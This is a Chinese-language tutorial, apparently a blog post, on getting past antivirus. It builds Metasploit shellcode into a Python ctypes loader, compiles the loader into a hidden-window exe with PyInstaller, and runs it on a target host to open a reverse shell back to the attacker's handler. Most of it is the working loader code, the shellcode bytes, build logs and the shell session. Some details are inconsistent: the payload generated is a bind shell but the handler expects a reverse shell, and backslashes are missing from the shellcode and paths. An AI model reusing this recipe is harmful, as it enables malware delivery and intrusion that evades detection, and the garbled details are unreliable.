Metasploit

绕过杀毒软件，有很多钟方法。此处介绍一种，编写python程序调用shellcode，并使用Pyinstaler将python程序编译为exe程序。

准备工作:(Windows XP环境下编译)

将Python程序编译为exe，须要Python主程序，pywin32库，Pyinstaller(直接解压到C盘)。

假设编译过程中出现错误提示，请依照指示解决这个问题。

安装过程不是非常复杂，在此不予说明。

https://www.python.org/ftp/python/2.7.8/python-2.7.8.msi
http://softlayer-dal.dl.sourceforge.net/project/pywin32/pywin32/Build%20219/pywin32-219.win32-py2.7.exe
https://pypi.python.org/packages/source/P/PyInstaller/PyInstaller-2.1.tar.gz

利用metasploit生成shellcode。供后面的python程序使用。

msf payload(shell_bind_tcp) > show options  
 
Module options (payload/windows/shell_bind_tcp):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     0.0.0.0          no        The target address
 
msf payload(shell_bind_tcp) > generate -b 'x00' -f /home/nixawk/bind_tcp.txt -p windows -t c
[*] Writing 1803 bytes to /home/nixawk/bind_tcp.txt...

准备完毕后。python程序源代码例如以下:

from ctypes import *

shellcode = 'xfcxe8x86x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx8bx4cx10x78xe3x4ax01xd1x51x8bx59x20x01xd3x8bx49x18xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx89x5dx68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68xeax0fxdfxe0xffxd5x97x6ax05x68xc0xa8x01x6bx68x02x00x11x5cx89xe6x6ax10x56x57x68x99xa5x74x61xffxd5x85xc0x74x0cxffx4ex08x75xecx68xf0xb5xa2x56xffxd5x6ax00x6ax04x56x57x68x02xd9xc8x5fxffxd5x8bx36x6ax40x68x00x10x00x00x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6ax00x56x53x57x68x02xd9xc8x5fxffxd5x01xc3x29xc6x85xf6x75xecxc3'

memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()

利用Pyinstaller编译上述包括shellcode的python文件，命令例如以下:

C:PyInstaller-2.1utils>pythonmakespec.py --onefile --noconsole shellcode.py

wrote C:PyInstaller-2.1utilsshellcode.spec
now run pyinstaller.py to build the executable

C:PyInstaller-2.1utils>pythonbuild.py shellcode.spec

59 INFO: Testing for ability to set icons, version resources...
69 INFO: ... resource update available
79 INFO: UPX is not available.
109 INFO: Processing hook hook-os
259 INFO: Processing hook hook-time
259 INFO: Processing hook hook-cPickle
349 INFO: Processing hook hook-_sre
509 INFO: Processing hook hook-cStringIO
639 INFO: Processing hook hook-encodings
660 INFO: Processing hook hook-codecs
1171 INFO: Extending PYTHONPATH with C:PyInstaller-2.1utils
1171 INFO: checking Analysis
1171 INFO: building Analysis because out00-Analysis.toc non existent
1171 INFO: running Analysis out00-Analysis.toc
1171 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1171 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...
1171 WARNING: Assembly not found
1180 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found
1220 WARNING: lib not found: MSVCR90.dll dependency of C:Python27python.exe
1230 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...
1230 WARNING: Assembly not found
1230 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found
1351 WARNING: lib not found: MSVCR90.dll dependency of C:WINDOWSsystem32python27.dll
1351 INFO: Analyzing C:PyInstaller-2.1PyInstallerloader\_pyi_bootstrap.py
1381 INFO: Processing hook hook-os
1401 INFO: Processing hook hook-site
1421 INFO: Processing hook hook-encodings
1562 INFO: Processing hook hook-time
1562 INFO: Processing hook hook-cPickle
1661 INFO: Processing hook hook-_sre
1822 INFO: Processing hook hook-cStringIO
1961 INFO: Processing hook hook-codecs
2463 INFO: Processing hook hook-pydoc
2632 INFO: Processing hook hook-email
2713 INFO: Processing hook hook-httplib
2763 INFO: Processing hook hook-email.message
2844 INFO: Analyzing C:PyInstaller-2.1PyInstallerloaderpyi_importers.py
2904 INFO: Analyzing C:PyInstaller-2.1PyInstallerloaderpyi_archive.py
2963 INFO: Analyzing C:PyInstaller-2.1PyInstallerloaderpyi_carchive.py
3043 INFO: Analyzing C:PyInstaller-2.1PyInstallerloaderpyi_os_path.py
3043 INFO: Analyzing shellcode.py
3114 INFO: Hidden import 'codecs' has been found otherwise
3114 INFO: Hidden import 'encodings' has been found otherwise
3114 INFO: Looking for run-time hooks
3154 WARNING: lib not found: MSVCR90.dll dependency of C:Python27DLLsselect.pyd
3203 WARNING: lib not found: MSVCR90.dll dependency of C:Python27DLLsunicodedata.pyd
3273 WARNING: lib not found: MSVCR90.dll dependency of C:Python27DLLs\_hashlib.pyd
3323 WARNING: lib not found: MSVCR90.dll dependency of C:Python27DLLsz2.pyd
3414 WARNING: lib not found: MSVCR90.dll dependency of C:Python27DLLs\_ssl.pyd
3484 WARNING: lib not found: MSVCR90.dll dependency of C:Python27DLLs\_ctypes.pyd
3555 WARNING: lib not found: MSVCR90.dll dependency of C:Python27DLLs\_socket.pyd
3575 INFO: Using Python library C:WINDOWSsystem32python27.dll
3625 INFO: Warnings written to C:PyInstaller-2.1utilsuildshellcodewarnshellcode.txt
3634 INFO: checking PYZ
3634 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
3634 INFO: building PYZ (ZlibArchive) out00-PYZ.toc
4815 INFO: checking PKG
4815 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
4815 INFO: building PKG (CArchive) out00-PKG.pkg
6167 INFO: checking EXE
6167 INFO: rebuilding out00-EXE.toc because shellcode.exe missing
6167 INFO: building EXE from out00-EXE.toc
6167 INFO: Appending archive to EXE C:PyInstaller-2.1utilsdistshellcode.exe

编译完毕后，将shellcode.exe放到目标主机上运行，成功获取反弹shell。

msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > show options  
 
Module options (exploit/multi/handler):
 
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
 
 
Payload options (windows/shell/reverse_tcp):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Wildcard Target
 
 
msf exploit(handler) > set LHOST 192.168.1.107
LHOST => 192.168.1.107
msf exploit(handler) > run
 
[*] Started reverse handler on 192.168.1.107:4444  
[*] Starting the payload handler...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.1.112
[*] Command shell session 1 opened (192.168.1.107:4444 -> 192.168.1.112:2061) at 2014-08-28 12:51:54 +0800
 
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
 
C:PyInstaller-2.1utils> 

參考链接:
http://pen-testing.sans.org/blog/pen-testing/2011/10/13/tips-for-evading-anti-virus-during-pen-testing
https://community.rapid7.com/community/metasploit/blog/2014/03/26/new-metasploit-49-helps-evade-anti-virus-solutions-test-network-segmentation-and-increase-productivity-for-penetration-testers
http://www.scriptjunkie.us/2011/04/why-encoding-does-not-matter-and-how-metasploit-generates-exes/
http://schierlm.users.sourceforge.net/avevasion.html
http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm/